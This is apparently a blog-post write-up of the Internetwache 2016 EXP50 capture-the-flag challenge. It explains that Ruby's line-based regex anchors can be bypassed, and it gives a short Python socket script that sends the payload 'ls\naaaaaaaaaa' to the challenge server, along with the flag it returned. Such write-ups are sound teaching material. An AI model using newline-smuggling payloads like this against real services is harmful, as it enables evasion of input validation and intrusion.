Monday, 22 February 2016

Internetwache 2016 EXP50 Writeup



When I access the server ;188.166.133.53:12037.
It shows "Let me count the ascii values of 10 characters:".
I just input some text such as "test", Then it shows an error as below:
"WRONG!!!! Only 10 characters matching /^[a-f]{10}$/ !"

The Ruby has a vulnerability of regex. I code to get a Flag.

 import socket  
   
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
 s.connect(('188.166.133.53', 12037))  
   
 print s.recv(1024)  
 print s.recv(1024)  
 s.send('ls\naaaaaaaaaa')  
 print s.recv(1024)  
 s.close()

Then, the server returns as below:

$ python test.py
Let me count the ascii values of 10 characters:
Sum is: 1203
IW{RUBY_R3G3X_F41L}


FLAG:
IW{RUBY_R3G3X_F41L}

Reference:
http://sakurity.com/blog/2015/06/04/mongo_ruby_regexp.html
Posted by at No comments:
Labels: , , , , , ,
Subscribe to: Posts (Atom)